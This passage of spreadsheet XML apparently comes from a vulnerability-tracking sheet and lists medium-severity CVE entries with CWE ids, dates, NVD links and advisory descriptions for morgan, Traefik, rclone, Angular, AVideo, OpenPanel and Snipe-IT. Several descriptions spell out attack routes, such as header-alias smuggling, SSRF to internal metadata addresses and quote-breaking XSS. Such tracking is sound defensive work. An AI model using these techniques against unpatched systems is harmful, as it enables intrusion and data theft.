      </c>
      <c r="M5299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87605</t>
        </is>
      </c>
    </row>
    <row r="5300">
      <c r="A5300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="C5300" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5300" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5300" s="5" t="inlineStr"/>
      <c r="F5300" s="5" t="inlineStr"/>
      <c r="G5300" s="5" t="inlineStr">
        <is>
          <t>apache, node.js</t>
        </is>
      </c>
      <c r="H5300" s="5" t="inlineStr"/>
      <c r="I5300" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5300" s="5" t="inlineStr"/>
      <c r="K5300" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="L5300" s="5" t="inlineStr">
        <is>
          <t>morgan is an HTTP request logger middleware for Node.js. In versions before 1.12.1, its escapeLogField() function does not escape the double quote character, which delimits the quoted fields of the Apache combined log format that morgan emits. An unauthenticated remote attacker who controls a value written to a quoted field, such as the User-Agent or Referer header, can include a double quote to close that field early, so a log consumer that parses the log by field position reads attacker-supplied text as the following field. In the built-in formats this makes the recorded value differ from the value that was sent, and in custom formats that quote an attacker-controlled token before a server-controlled one it can forge values such as the response status. No newline is injected, so record separation stays intact. The issue is fixed in morgan 1.12.1, which escapes the double quote. Users should upgrade to morgan 1.12.1 or later.</t>
        </is>
      </c>
      <c r="M5300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="5301">
      <c r="A5301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88011</t>
        </is>
      </c>
      <c r="C5301" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5301" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5301" s="5" t="inlineStr"/>
      <c r="F5301" s="5" t="inlineStr"/>
      <c r="G5301" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H5301" s="5" t="inlineStr"/>
      <c r="I5301" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5301" s="5" t="inlineStr"/>
      <c r="K5301" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L5301"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M5301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88011</t>
        </is>
      </c>
    </row>
    <row r="5302">
      <c r="A5302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88012</t>
        </is>
      </c>
      <c r="C5302" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5302" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5302" s="5" t="inlineStr"/>
      <c r="F5302" s="5" t="inlineStr"/>
      <c r="G5302" s="5" t="inlineStr"/>
      <c r="H5302" s="5" t="inlineStr"/>
      <c r="I5302" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5302" s="5" t="inlineStr"/>
      <c r="K5302" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5302" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. From 2.8.2 until 2.11.56 and 3.7.12, HTTP/3 entrypoints do not apply entryPoints..transport.respondingTimeouts.readTimeout because the timeout is enforced on a TCP connection and the HTTP/3 server has no corresponding QUIC stream deadline. An unauthenticated client can use a slow request body, trickling data indefinitely while holding a request and an upstream connection open and exhausting backends with bounded connection pools. This issue is fixed in 2.11.56 and 3.7.12.</t>
        </is>
      </c>
      <c r="M5302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88012</t>
        </is>
      </c>
    </row>
    <row r="5303">
      <c r="A5303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88015</t>
        </is>
      </c>
      <c r="C5303" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5303" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5303" s="5" t="inlineStr"/>
      <c r="F5303" s="5" t="inlineStr"/>
      <c r="G5303" s="5" t="inlineStr"/>
      <c r="H5303" s="5" t="inlineStr"/>
      <c r="I5303" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5303" s="5" t="inlineStr"/>
      <c r="K5303" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-248</t>
        </is>
      </c>
      <c r="L5303" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.1, backend/local with --links or links=true exposes symlink targets as .rclonelink objects, and fs.RangeOption.Decode can pass an unchecked positive Range start through Object.Open and openTranslatedLink. The function slices the target string as linkdst[offset:], so a Range start larger than the target length causes a deterministic slice-bounds panic when lib/http/serve exposes the object through HTTP or WebDAV. Go net/http normally recovers the panic per connection, causing request-level denial of service rather than terminating the entire process. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M5303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88015</t>
        </is>
      </c>
    </row>
    <row r="5304">
      <c r="A5304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88046</t>
        </is>
      </c>
      <c r="C5304" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5304" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5304" s="5" t="inlineStr"/>
      <c r="F5304" s="5" t="inlineStr"/>
      <c r="G5304" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H5304" s="5" t="inlineStr"/>
      <c r="I5304" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5304" s="5" t="inlineStr"/>
      <c r="K5304" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5304" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.1, rclone core does not reject parent-directory segments in source Object.Remote() values before fs/list, fs/walk, fs/sync, and fs/operations pass those values to destination backends. A flat-keyspace source object store populated with native non-rclone tooling can contain a raw .. key segment, and affected b2, swift, qingstor, oracleobjectstorage, internetarchive, smb, storj, sftp, webdav, ftp, filelu, shade, and sia destinations use path.Join(root, remote) before EncodeDot can neutralize the segment. A copy or upload can therefore escape the configured root into another bucket, share, or path reachable by the victim credential, with sftp and smb potentially reaching other filesystem or share locations under the same login authority. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M5304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88046</t>
        </is>
      </c>
    </row>
    <row r="5305">
      <c r="A5305" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88057</t>
        </is>
      </c>
      <c r="C5305" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5305" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5305" s="5" t="inlineStr"/>
      <c r="F5305" s="5" t="inlineStr"/>
      <c r="G5305" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5305" s="5" t="inlineStr"/>
      <c r="I5305" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5305" s="5" t="inlineStr"/>
      <c r="K5305" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5305" s="5" t="inlineStr">
        <is>
          <t>Angular is a development platform for building mobile and desktop web applications using TypeScript/JavaScript and other languages. Prior to 20.3.28, 21.2.20, and 22.1.0, Angular's compiler and runtime in @angular/core and @angular/compiler could omit or select an incorrect sanitizer for security-sensitive directive host bindings because SecurityContext was derived from the declaring directive or component selector rather than the concrete host element. The mismatch is reachable through hostDirectives composition, inherited HostBinding declarations, createComponent with a custom hostElement or dynamic directives, SVG/MathML namespace elements, and tag-neutral selectors such as :not(...). Attacker-controlled href, src, action, xlink:href, or data values can therefore reach DOM attributes without Angular's built-in sanitizer and execute arbitrary JavaScript in the user's browser context. Applications unable to upgrade can use DomSanitizer.sanitize with SecurityContext.URL before assignment or restrict inputs to validated HTTP and HTTPS URL schemes. This issue is fixed in versions 20.3.28, 21.2.20, and 22.1.0.</t>
        </is>
      </c>
      <c r="M5305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88057</t>
        </is>
      </c>
    </row>
    <row r="5306">
      <c r="A5306" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88871</t>
        </is>
      </c>
      <c r="C5306" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5306" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5306" s="5" t="inlineStr"/>
      <c r="F5306" s="5" t="inlineStr"/>
      <c r="G5306" s="5" t="inlineStr"/>
      <c r="H5306" s="5" t="inlineStr"/>
      <c r="I5306" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5306" s="5" t="inlineStr"/>
      <c r="K5306" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5306" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 (master, 2026-08-23) contains a cross-site request forgery vulnerability in the CustomizeUser plugin's plugin/CustomizeUser/setSubscribers.json.php endpoint. The script reads users_id and ExtraSubscribers from $_REQUEST and calls User::setExtraSubscribers() without requiring a POST request or a valid CSRF token; autoCSRFGuard() is applied only to POST requests to *.json.php, and the mutation does not pass through ObjectYPT::save()/isUntrustedRequest(), so a cross-origin GET succeeds. An unauthenticated remote attacker who induces a logged-in administrator to load a crafted page (for example an &lt;img&gt; tag pointing at the endpoint) can forge the ExtraSubscribers count displayed on any user's channel. The CustomizeUser plugin is enabled by default, and no patched version was available at the time of reporting.</t>
        </is>
      </c>
      <c r="M5306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88871</t>
        </is>
      </c>
    </row>
    <row r="5307">
      <c r="A5307" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88875</t>
        </is>
      </c>
      <c r="C5307" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5307" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5307" s="5" t="inlineStr"/>
      <c r="F5307" s="5" t="inlineStr"/>
      <c r="G5307" s="5" t="inlineStr"/>
      <c r="H5307" s="5" t="inlineStr"/>
      <c r="I5307" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5307" s="5" t="inlineStr"/>
      <c r="K5307" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="L5307" s="5" t="inlineStr">
        <is>
          <t>AVideo through revision c3edcc274c389816d434acadac07ee78eaf330c1 (master, 2026-08-23) incompletely sanitizes sensitive user fields in the APIName=video response. Video rows include columns joined from the video owner's user record, and API::get_api_video() calls removeSensitiveUserFields() only when the caller is neither authenticated nor using a valid API secret; it never compares User::getId() with the row's users_id. As a result, any low-privilege authenticated account can request another user's video and receive the owner's email address, account name (user), and isAdmin, canUpload and canStream flags, which are removed for guests and should be returned only to the owner or to callers with a valid API secret. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="M5307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88875</t>
        </is>
      </c>
    </row>
    <row r="5308">
      <c r="A5308" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88879</t>
        </is>
      </c>
      <c r="C5308" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5308" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5308" s="5" t="inlineStr"/>
      <c r="F5308" s="5" t="inlineStr"/>
      <c r="G5308" s="5" t="inlineStr">
        <is>
          <t>sap, nginx</t>
        </is>
      </c>
      <c r="H5308" s="5" t="inlineStr"/>
      <c r="I5308" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5308" s="5" t="inlineStr"/>
      <c r="K5308" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L5308" s="5" t="inlineStr">
        <is>
          <t>Traefik is an HTTP reverse proxy and load balancer. In Traefik v1.x, v2.x through v2.11.55, and v3.0.0 through v3.7.11, header names are canonicalized only on dashes, so X-Auth-User, X_Auth_User and X.Auth.User are treated as three distinct headers by Traefik, while backends that derive variable names from header names (CGI, WSGI, PHP, NGINX and others) collapse them into a single variable. A client can therefore smuggle a dot-form alias of a header that Traefik manages past the middleware managing it — for example supplying X.Authenticated.User alongside the canonical X-Authenticated-User written by the ForwardAuth middleware — causing such a backend to read the client-supplied value instead of the identity Traefik asserted. In the tested configuration (PHP 8.2 built-in SAPI over an HTTP/1 backend path), Go's lexical header ordering makes the attacker-supplied value win deterministically, so a client that ForwardAuth admits as a low-privilege identity can be treated by the backend as a different user or role. Any header Traefik sets is affected, not only ForwardAuth's. This is an incomplete fix for GHSA-x677-9fxg-v5c5, which blocked only the underscore form. Fixed in v2.11.56 and v3.7.12, which add the aliasHeadersStrategy entry-point option; because it defaults to 'keep' for backwards compatibility, it must be explicitly set to 'delete' or 'reject' for the fix to take effect. Unmaintained release lines will not receive a patch.</t>
        </is>
      </c>
      <c r="M5308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88879</t>
        </is>
      </c>
    </row>
    <row r="5309">
      <c r="A5309" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88892</t>
        </is>
      </c>
      <c r="C5309" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5309" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5309" s="5" t="inlineStr"/>
      <c r="F5309" s="5" t="inlineStr"/>
      <c r="G5309" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H5309" s="5" t="inlineStr"/>
      <c r="I5309" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5309" s="5" t="inlineStr"/>
      <c r="K5309" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5309" s="5" t="inlineStr">
        <is>
          <t>OpenPanel is an analytics platform. In all versions (no patched release available at time of publication), the data importer fetches a caller-supplied URL with plain fetch instead of the project's existing SSRF guard (apps/api/src/utils/safe-fetch.ts). In packages/importer/src/providers/umami.ts, parseRemoteFile calls fetch() on config.fileUrl, which is validated only by z.string().url(), so values such as http://127.0.0.1:9911/ or http://169.254.169.254/latest/meta-data/ are accepted; the shared createFileImportConfig factory gives the plausible provider the same field. An authenticated organization member — including a default 'member' with no project_access rows, for whom the intended access-level check is skipped because getProjectAccess returns boolean true rather than a level object — can therefore make the server connect to any address reachable from it. The resulting HTTP status and status text are persisted as Import.errorMessage and returned by import.get to the same user, providing a scanning oracle for internal hosts, ports and paths; if an internal response parses as Umami CSV, its rows are ingested as events and become readable in the attacker's analytics views.</t>
        </is>
      </c>
      <c r="M5309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88892</t>
        </is>
      </c>
    </row>
    <row r="5310">
      <c r="A5310" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88894</t>
        </is>
      </c>
      <c r="C5310" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5310" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5310" s="5" t="inlineStr"/>
      <c r="F5310" s="5" t="inlineStr"/>
      <c r="G5310" s="5" t="inlineStr"/>
      <c r="H5310" s="5" t="inlineStr"/>
      <c r="I5310" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5310" s="5" t="inlineStr"/>
      <c r="K5310" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5310" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT's predefined kit checkout path does not enforce Full Multiple Company Support (FMCS) tenant isolation on the checkout target. Unlike the single, bulk, API, accessory, license and consumable checkout paths, App\Services\PredefinedKitCheckoutService never calls $item-&gt;canCheckoutTo($target); it only performs the actor-vs-item policy check and an availability check before persisting the checkout. With FMCS enabled, a non-superuser who belongs to at least two companies and holds the assets.checkout permission can POST to /kits/{kit}/checkout with a user_id belonging only to company B and have a company-A asset (and likewise kit licenses, consumables and accessories) assigned to that user, bypassing the company-mismatch check that blocks the same operation on every other checkout path. The issue is fixed in Snipe-IT 8.7.2; it was runtime-verified on v8.6.3 and code-inspected on v8.7.1, and the affected service has lacked the check since 2019, so earlier FMCS deployments are likely also affected.</t>
        </is>
      </c>
      <c r="M5310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88894</t>
        </is>
      </c>
    </row>
    <row r="5311">
      <c r="A5311" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89179</t>
        </is>
      </c>
      <c r="C5311" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5311" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5311" s="5" t="inlineStr"/>
      <c r="F5311" s="5" t="inlineStr"/>
      <c r="G5311" s="5" t="inlineStr"/>
      <c r="H5311" s="5" t="inlineStr"/>
      <c r="I5311" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5311" s="5" t="inlineStr"/>
      <c r="K5311" s="5" t="inlineStr">
        <is>
          <t>CWE-353</t>
        </is>
      </c>
      <c r="L5311" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has a Missing Support for Integrity Check vulnerability. Unauthenticated attackers on the same network can intercept a student's connection packet and replay it, thereby forging the appearance that the student remains connected.</t>
        </is>
      </c>
      <c r="M5311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89179</t>
        </is>
      </c>
    </row>
    <row r="5312">
      <c r="A5312" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89239</t>
        </is>
      </c>
      <c r="C5312" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5312" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5312" s="5" t="inlineStr"/>
      <c r="F5312" s="5" t="inlineStr"/>
      <c r="G5312" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5312" s="5" t="inlineStr"/>
      <c r="I5312" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5312" s="5" t="inlineStr"/>
      <c r="K5312" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5312" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in the showAlertMessage() function that inserts the raw Referer header into a JavaScript comment without encoding. Attackers can craft a Referer header containing */ to close the comment and inject arbitrary JavaScript that executes in the site origin for visitors arriving from the attacker-controlled page.</t>
        </is>
      </c>
      <c r="M5312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89239</t>
        </is>
      </c>
    </row>
    <row r="5313">
      <c r="A5313" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89240</t>
        </is>
      </c>
      <c r="C5313" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5313" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5313" s="5" t="inlineStr"/>
      <c r="F5313" s="5" t="inlineStr"/>
      <c r="G5313" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5313" s="5" t="inlineStr"/>
      <c r="I5313" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5313" s="5" t="inlineStr"/>
      <c r="K5313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5313" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in plugin/Live/confirmLivePassword.php. The script interpolates the unauthenticated GET parameter u (which is not covered by $securityFilter) directly into an &lt;img src="..."&gt; attribute without URL- or HTML-encoding. A remote attacker can craft a link containing a double-quote character in u (with a non-empty key parameter and no valid c parameter) to close the src attribute and inject an additional tag with an onerror handler, executing arbitrary JavaScript in the site's origin in the browser of any user, including an administrator, who opens the link. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="M5313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89240</t>
        </is>
      </c>
    </row>
    <row r="5314">
      <c r="A5314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89241</t>
        </is>
      </c>
      <c r="C5314" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5314" s="5" t="inlineStr"/>
      <c r="F5314" s="5" t="inlineStr"/>
      <c r="G5314" s="5" t="inlineStr"/>
      <c r="H5314" s="5" t="inlineStr"/>
      <c r="I5314" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5314" s="5" t="inlineStr"/>
      <c r="K5314" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5314" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in confirmLivePassword.php that copies REQUEST_URI into a form action attribute without encoding. Attackers can craft a malicious URL with a quote character to break out of the action attribute and inject event handlers that execute in the victim's browser within the site origin.</t>
        </is>
      </c>
      <c r="M5314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89241</t>
        </is>
      </c>
    </row>
    <row r="5315">
      <c r="A5315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89244</t>
        </is>
      </c>
      <c r="C5315" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5315" s="5" t="inlineStr"/>
      <c r="F5315" s="5" t="inlineStr"/>
      <c r="G5315" s="5" t="inlineStr"/>
      <c r="H5315" s="5" t="inlineStr"/>
      <c r="I5315" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5315" s="5" t="inlineStr"/>
      <c r="K5315" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5315" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a reflected cross-site scripting vulnerability in plugin/Gallery/view/Category.php when SubCategorys is enabled. The getBackURL parameter is echoed into an href attribute without HTML encoding, allowing attackers to inject malicious scripts that execute in visitors' browsers when they interact with the Back control.</t>
        </is>
      </c>
      <c r="M5315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89244</t>
        </is>
      </c>
    </row>
    <row r="5316">
      <c r="A5316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89247</t>
        </is>
      </c>
      <c r="C5316" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5316" s="5" t="inlineStr"/>
      <c r="F5316" s="5" t="inlineStr"/>
      <c r="G5316" s="5" t="inlineStr"/>
      <c r="H5316" s="5" t="inlineStr"/>
      <c r="I5316" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5316" s="5" t="inlineStr"/>
      <c r="K5316" s="5" t="inlineStr">
        <is>
          <t>CWE-91</t>
        </is>
      </c>
      <c r="L5316" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo at commit c3edcc274c389816d434acadac07ee78eaf330c1 and earlier contains an XML injection vulnerability in plugin/AD_Server/VMAP.php, which is reachable without authentication when the AD_Server plugin is enabled. The script emits Content-Type: application/xml and writes the timeOffset and idTag values returned by AD_Server::getVMAPSFromRequest() directly into VMAP attributes without encoding. Those values originate from the base64- and JSON-decoded $_REQUEST['vmaps'] parameter, which is not covered by $securityFilter in objects/security.php. A remote attacker can craft a vmaps value (containing a non-empty VAST.campaing entry) and induce a user to open the resulting VMAP URL or a video page using it, injecting arbitrary &lt;vmap:AdBreak&gt; and &lt;vmap:AdTagURI&gt;/AdSource nodes into the generated XML. The player's IMA path (afterVideoJS -&gt; PlayerSkins::setIMAADTag) then requests the attacker-supplied ad URLs, resulting in ad injection and cross-origin requests from the victim's playback session. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="M5316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89247</t>
        </is>
      </c>
    </row>
    <row r="5317">
      <c r="A5317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89257</t>
        </is>
      </c>
      <c r="C5317" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D5317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5317" s="5" t="inlineStr"/>
      <c r="F5317" s="5" t="inlineStr"/>
      <c r="G5317" s="5" t="inlineStr"/>
      <c r="H5317" s="5" t="inlineStr"/>
      <c r="I5317" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5317" s="5" t="inlineStr"/>
      <c r="K5317" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5317" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an insecure direct object reference (IDOR) vulnerability in objects/categoryDeleteAssets.json.php. The endpoint validates only the Category::canCreateCategory() capability and a CSRF nonce before passing the attacker-supplied $_REQUEST['id'] to Category::deleteAssets(), which recursively removes {systemRootPath}videos/categories/assets/{id}/. It omits the Category::userCanEditCategory() ownership check enforced by the sibling Category::delete(). On installations where the non-default usersCanCreateNewCategories setting is enabled, an authenticated non-admin user with the canUpload capability can send a POST request with an arbitrary category ID and recursively delete any category's on-disk asset directory (icons/images). Category records and videos are not deleted. As of the advisory publication no patched version was available.</t>
        </is>
      </c>
      <c r="M5317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89257</t>
        </is>
      </c>
    </row>
    <row r="5318">
      <c r="A5318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9161</t>
        </is>
